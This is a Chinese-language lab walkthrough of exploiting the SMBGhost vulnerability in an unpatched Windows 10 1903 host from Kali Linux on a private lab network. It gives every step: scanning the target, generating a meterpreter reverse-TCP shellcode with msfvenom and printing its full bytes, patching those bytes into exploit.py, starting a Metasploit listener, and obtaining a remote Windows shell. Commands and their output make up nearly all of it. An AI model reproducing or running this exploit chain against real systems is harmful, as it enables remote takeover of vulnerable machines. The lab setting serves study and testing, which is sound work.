一、环境
系统 版本 IP地址
Kali Kali2020.1 192.168.101.129
Windows Win10-1903版 192.168.101.128
二、实验步骤
1.上传相关软件包(SMBGhost_RCE_PoC-master、SMBGhost-master)

2.查看相关软件包是否上传成功
root@kali:~# ls
公共 视频 文档 音乐 SMBGhost-master.zip
模板 图片 下载 桌面 SMBGhost_RCE_PoC-master.zip
root@kali:~#
3.解压SMBGhost-master.zip压缩包并查看该解压出的文件
root@kali:~# unzip SMBGhost-master.zip
Archive: SMBGhost-master.zip
creating: SMBGhost-master/
inflating: SMBGhost-master/README.md
inflating: SMBGhost-master/scanner.py
inflating: SMBGhost-master/SMBGhost.pcap
root@kali:~# cd SMBGhost-master/
root@kali:~/SMBGhost-master# ls
README.md scanner.py SMBGhost.pcap
root@kali:~/SMBGhost-master#
4.使用Python3运行SMBGhost-master中的scanner.py，检测目标是否存在该漏洞
root@kali:~/SMBGhost-master# python3 scanner.py 192.168.101.128
192.168.101.128 Vulnerable
root@kali:~/SMBGhost-master#
5.解压SMBGhost_RCE_PoC-master.zip压缩包并查看解压出的文件
root@kali:~/SMBGhost-master# cd
root@kali:~# unzip SMBGhost_RCE_PoC-master.zip
Archive: SMBGhost_RCE_PoC-master.zip
f55e6abd47cb3a4f771c965053a5a92133a18781
creating: SMBGhost_RCE_PoC-master/
inflating: SMBGhost_RCE_PoC-master/.gitignore
inflating: SMBGhost_RCE_PoC-master/README.md
inflating: SMBGhost_RCE_PoC-master/exploit.py
inflating: SMBGhost_RCE_PoC-master/kernel_shellcode.asm
inflating: SMBGhost_RCE_PoC-master/lznt1.py
inflating: SMBGhost_RCE_PoC-master/smb_win.py
root@kali:~# cd SMBGhost_RCE_PoC-master/
root@kali:~/SMBGhost_RCE_PoC-master# ls
exploit.py kernel_shellcode.asm lznt1.py README.md smb_win.py
root@kali:~/SMBGhost_RCE_PoC-master#
6.使用msfvenom工具生成payload并回显
root@kali:~/SMBGhost_RCE_PoC-master# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.129 lport=9999 -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of python file: 2688 bytes
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x77\x55\x89\xfd\x29\x7f\x6c"
buf += b"\x86\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x8b\x1d\x0a\x19\xd9\x97\xa0\x86\x77\x55\xc8\xac\x68"
buf += b"\x2f\x3e\xd7\x21\x1d\xb8\x2f\x4c\x37\xe7\xd4\x17\x1d"
buf += b"\x02\xaf\x31\x37\xe7\xd4\x57\x1d\x02\x8f\x79\x37\x63"
buf += b"\x31\x3d\x1f\xc4\xcc\xe0\x37\x5d\x46\xdb\x69\xe8\x81"
buf += b"\x2b\x53\x4c\xc7\xb6\x9c\x84\xbc\x28\xbe\x8e\x6b\x25"
buf += b"\x14\xd8\xb5\xa2\x2d\x4c\x0d\x35\x69\xc1\xfc\xf9\x19"
buf += b"\xed\xfe\x6f\x5e\x8b\xf2\xac\x0d\x6c\x86\x77\xde\x09"
buf += b"\x75\x29\x7f\x6c\xce\xf2\x95\xfd\x9a\x61\x7e\xbc\xd6"
buf += b"\xfc\x1d\x91\xb9\xa2\x3f\x4c\xcf\x76\x85\x6a\xab\x61"
buf += b"\x80\xa5\xc7\xfc\x61\x01\xb5\x28\xa9\x21\xb7\xbe\x1d"
buf += b"\xb8\x3d\x85\x3e\xad\x4f\x7a\x14\x88\x3c\x11\x9f\x19"
buf += b"\x77\x3b\x56\xc5\xd9\x21\x3a\x55\x57\x02\x8d\xd1\xb9"
buf += b"\xa2\x3f\x48\xcf\x76\x85\xef\xbc\xa2\x73\x24\xc2\xfc"
buf += b"\x15\x95\xb4\x28\xaf\x2d\x0d\x73\xdd\xc1\xfc\xf9\x3e"
buf += b"\x34\xc7\x2f\x0b\xd0\xa7\x68\x27\x2d\xdf\x36\x0f\xc1"
buf += b"\x7e\xc5\x5f\x2d\xd4\x88\xb5\xd1\xbc\x70\x25\x24\x0d"
buf += b"\x65\xbc\xc2\x02\xd6\x80\x31\xcf\xc9\x22\xfa\xcf\x76"
buf += b"\x4c\x5e\x86\x77\x14\xdf\xb4\xa0\x99\x24\x07\x9b\xf5"
buf += b"\x88\xfd\x29\x36\xe5\x63\x3e\xe9\x8b\xfd\x0e\x70\xac"
buf += b"\x2e\x12\xd4\xc8\xa9\x60\xf6\x88\xca\xfe\xa4\xc8\x47"
buf += b"\x65\x08\x4a\x81\x88\x80\xc5\x74\xc3\x17\x6d\x87\x77"
buf += b"\x55\xd0\xbc\x93\x56\xec\xed\x77\xaa\x5c\x97\x23\x3e"
buf += b"\x32\xd6\x27\x18\xb8\x34\x64\x4e\xac\xce\x88\x95\xc1"
buf += b"\x74\xeb\x37\x93\x46\x3f\xdc\x48\xbc\x93\x95\x63\x59"
buf += b"\x97\xaa\x5c\xb5\xa0\xb8\x06\x96\x36\x0d\xc5\x74\xcb"
buf += b"\x37\xe5\x7f\x36\xef\x10\x58\x5d\x1e\x93\x53\xf2\x95"
buf += b"\xfd\xf7\x60\x80\xa2\xf3\x92\xbd\x1a\xfd\x29\x7f\x24"
buf += b"\x05\x9b\x45\xc1\x74\xcb\x32\x5d\x4f\x1d\x51\xc8\xa5"
buf += b"\x61\xf6\x95\xc7\xcd\x57\x50\x35\x76\x80\xb9\x05\x8f"
buf += b"\x55\xf7\xa8\x61\xfc\xa8\xa6\x29\xdc\x7f\x97\x69\x3e"
buf += b"\x35\xee\x77\x45\x89\xfd\x68\x27\x24\x0f\x85\x1d\xb8"
buf += b"\x34\x68\xc5\x34\x22\x24\xb0\x76\x28\x61\xf6\xaf\xcf"
buf += b"\xfe\x92\xc4\xcc\xe0\x36\xe5\x76\x3f\xdc\x53\xb5\xa0"
buf += b"\x86\x2d\x3c\x75\x8c\x41\xa2\xd6\xaa\xef\x7e\x77\x28"
buf += b"\xa1\xa5\x68\x28\x35\xee\x77\x15\x89\xfd\x68\x27\x06"
buf += b"\x86\x2d\x14\x33\xf6\x06\x70\x5c\x79\xa2\x02\xd0\xbc"
buf += b"\x93\x0a\x02\xcb\x16\xaa\x5c\xb4\xd6\xb1\x85\xba\x88"
buf += b"\xaa\x76\xb5\x28\xbc\x24\xaf\xb1\x1d\x0c\x0b\x5c\xcb"
buf += b"\x2d\x79\x90\x0d\xe3\xfd\x70\x36\xab\x44\x87\xe0\x2b"
buf += b"\xab\xd6\xaa\x6c\x86"
root@kali:~/SMBGhost_RCE_PoC-master#
7.修改exploit.py文件，删除第91行至第127行
root@kali:~/SMBGhost_RCE_PoC-master# vim exploit.py
root@kali:~/SMBGhost_RCE_PoC-master# cat -n exploit.py
1 #!/usr/bin/env python
2
3 import sys
4 import socket
5 import struct
6 import argparse
7
8 from lznt1 import compress, compress_evil
9 from smb_win import smb_negotiate, smb_compress
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
90
91
92
93 PML4_SELFREF = 0
94 PHAL_HEAP = 0
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
420 if __name__ == "__main__":
421 parser = argparse.ArgumentParser()
422 parser.add_argument("-ip", help="IP address of target", required=True)
423 parser.add_argument("-p", "--port", default=445, help="SMB port, \
424 default: 445", required=False, type=int)
425 args = parser.parse_args()
426
427 do_rce(args.ip, args.port)
root@kali:~/SMBGhost_RCE_PoC-master#
8.将上面msfvenom回显出的内容复制到exploit.py文件的第91行位置，并在粘贴的buf内容之后另起一行写入USER_PAYLOAD = buf，使exploit.py可以调用该payload
root@kali:~/SMBGhost_RCE_PoC-master# vim exploit.py
root@kali:~/SMBGhost_RCE_PoC-master# cat -n exploit.py
1 #!/usr/bin/env python
2
3 import sys
4 import socket
5 import struct
6 import argparse
7
8 from lznt1 import compress, compress_evil
9 from smb_win import smb_negotiate, smb_compress
10
11 # Use lowstub jmp bytes to signature search
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
90
91 buf = b""
92 buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
93 buf += b"\xef\xff\xff\xff\x48\xbb\x77\x55\x89\xfd\x29\x7f\x6c"
94 buf += b"\x86\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
95 buf += b"\x8b\x1d\x0a\x19\xd9\x97\xa0\x86\x77\x55\xc8\xac\x68"
96 buf += b"\x2f\x3e\xd7\x21\x1d\xb8\x2f\x4c\x37\xe7\xd4\x17\x1d"
97 buf += b"\x02\xaf\x31\x37\xe7\xd4\x57\x1d\x02\x8f\x79\x37\x63"
98 buf += b"\x31\x3d\x1f\xc4\xcc\xe0\x37\x5d\x46\xdb\x69\xe8\x81"
99 buf += b"\x2b\x53\x4c\xc7\xb6\x9c\x84\xbc\x28\xbe\x8e\x6b\x25"
100 buf += b"\x14\xd8\xb5\xa2\x2d\x4c\x0d\x35\x69\xc1\xfc\xf9\x19"
101 buf += b"\xed\xfe\x6f\x5e\x8b\xf2\xac\x0d\x6c\x86\x77\xde\x09"
102 buf += b"\x75\x29\x7f\x6c\xce\xf2\x95\xfd\x9a\x61\x7e\xbc\xd6"
103 buf += b"\xfc\x1d\x91\xb9\xa2\x3f\x4c\xcf\x76\x85\x6a\xab\x61"
104 buf += b"\x80\xa5\xc7\xfc\x61\x01\xb5\x28\xa9\x21\xb7\xbe\x1d"
105 buf += b"\xb8\x3d\x85\x3e\xad\x4f\x7a\x14\x88\x3c\x11\x9f\x19"
106 buf += b"\x77\x3b\x56\xc5\xd9\x21\x3a\x55\x57\x02\x8d\xd1\xb9"
107 buf += b"\xa2\x3f\x48\xcf\x76\x85\xef\xbc\xa2\x73\x24\xc2\xfc"
108 buf += b"\x15\x95\xb4\x28\xaf\x2d\x0d\x73\xdd\xc1\xfc\xf9\x3e"
109 buf += b"\x34\xc7\x2f\x0b\xd0\xa7\x68\x27\x2d\xdf\x36\x0f\xc1"
110 buf += b"\x7e\xc5\x5f\x2d\xd4\x88\xb5\xd1\xbc\x70\x25\x24\x0d"
111 buf += b"\x65\xbc\xc2\x02\xd6\x80\x31\xcf\xc9\x22\xfa\xcf\x76"
112 buf += b"\x4c\x5e\x86\x77\x14\xdf\xb4\xa0\x99\x24\x07\x9b\xf5"
113 buf += b"\x88\xfd\x29\x36\xe5\x63\x3e\xe9\x8b\xfd\x0e\x70\xac"
114 buf += b"\x2e\x12\xd4\xc8\xa9\x60\xf6\x88\xca\xfe\xa4\xc8\x47"
115 buf += b"\x65\x08\x4a\x81\x88\x80\xc5\x74\xc3\x17\x6d\x87\x77"
116 buf += b"\x55\xd0\xbc\x93\x56\xec\xed\x77\xaa\x5c\x97\x23\x3e"
117 buf += b"\x32\xd6\x27\x18\xb8\x34\x64\x4e\xac\xce\x88\x95\xc1"
118 buf += b"\x74\xeb\x37\x93\x46\x3f\xdc\x48\xbc\x93\x95\x63\x59"
119 buf += b"\x97\xaa\x5c\xb5\xa0\xb8\x06\x96\x36\x0d\xc5\x74\xcb"
120 buf += b"\x37\xe5\x7f\x36\xef\x10\x58\x5d\x1e\x93\x53\xf2\x95"
121 buf += b"\xfd\xf7\x60\x80\xa2\xf3\x92\xbd\x1a\xfd\x29\x7f\x24"
122 buf += b"\x05\x9b\x45\xc1\x74\xcb\x32\x5d\x4f\x1d\x51\xc8\xa5"
123 buf += b"\x61\xf6\x95\xc7\xcd\x57\x50\x35\x76\x80\xb9\x05\x8f"
124 buf += b"\x55\xf7\xa8\x61\xfc\xa8\xa6\x29\xdc\x7f\x97\x69\x3e"
125 buf += b"\x35\xee\x77\x45\x89\xfd\x68\x27\x24\x0f\x85\x1d\xb8"
126 buf += b"\x34\x68\xc5\x34\x22\x24\xb0\x76\x28\x61\xf6\xaf\xcf"
127 buf += b"\xfe\x92\xc4\xcc\xe0\x36\xe5\x76\x3f\xdc\x53\xb5\xa0"
128 buf += b"\x86\x2d\x3c\x75\x8c\x41\xa2\xd6\xaa\xef\x7e\x77\x28"
129 buf += b"\xa1\xa5\x68\x28\x35\xee\x77\x15\x89\xfd\x68\x27\x06"
130 buf += b"\x86\x2d\x14\x33\xf6\x06\x70\x5c\x79\xa2\x02\xd0\xbc"
131 buf += b"\x93\x0a\x02\xcb\x16\xaa\x5c\xb4\xd6\xb1\x85\xba\x88"
132 buf += b"\xaa\x76\xb5\x28\xbc\x24\xaf\xb1\x1d\x0c\x0b\x5c\xcb"
133 buf += b"\x2d\x79\x90\x0d\xe3\xfd\x70\x36\xab\x44\x87\xe0\x2b"
134 buf += b"\xab\xd6\xaa\x6c\x86"
135
136 USER_PAYLOAD = buf
137
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
465 if __name__ == "__main__":
466 parser = argparse.ArgumentParser()
467 parser.add_argument("-ip", help="IP address of target", required=True)
468 parser.add_argument("-p", "--port", default=445, help="SMB port, \
469 default: 445", required=False, type=int)
470 args = parser.parse_args()
471
472 do_rce(args.ip, args.port)
root@kali:~/SMBGhost_RCE_PoC-master#
9.初始化数据库,并进入msf工具
root@kali:~/SMBGhost_RCE_PoC-master# service postgresql start
root@kali:~/SMBGhost_RCE_PoC-master# msfdb init
[i] Database already started
[+] Creating database user 'msf'
为新角色输入的口令:
再输入一遍:
[+] Creating databases 'msf'
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating databases 'msf_test'
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
root@kali:~/SMBGhost_RCE_PoC-master#
10.启动msf数据库,打开监听模块
root@kali:~/SMBGhost_RCE_PoC-master# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v5.0.71-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > service postgresql start
[*] exec: service postgresql start
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.101.129
lhost => 192.168.101.129
msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) >
11.开始攻击,并查看拿到的权限
root@kali:~/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.101.128
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff78f80000000
[+] found PML4 self-ref entry 197
[+] found HalpInterruptController at fffff78f80001478
[+] found HalpApicRequestInterrupt at fffff8011b6c5bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffffcbfbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...
root@kali:~/SMBGhost_RCE_PoC-master#
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.101.129:9999
[*] Sending stage (206403 bytes) to 192.168.101.128
[*] Meterpreter session 1 opened (192.168.101.129:9999 -> 192.168.101.128:49686) at 2021-02-24 02:11:01 -0500
meterpreter > shell
Process 5968 created.
Channel 1 created.
Microsoft Windows [版本 10.0.18362.30]
(c) 2019 Microsoft Corporation。保留所有权利。
C:\Windows\system32>ipconfig
Windows IP 配置
以太网适配器 Ethernet0:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::79ac:3add:3bd3:5ac7%10
IPv4 地址 . . . . . . . . . . . . : 192.168.101.128
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.101.2
以太网适配器 ������������:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
C:\Windows\system32>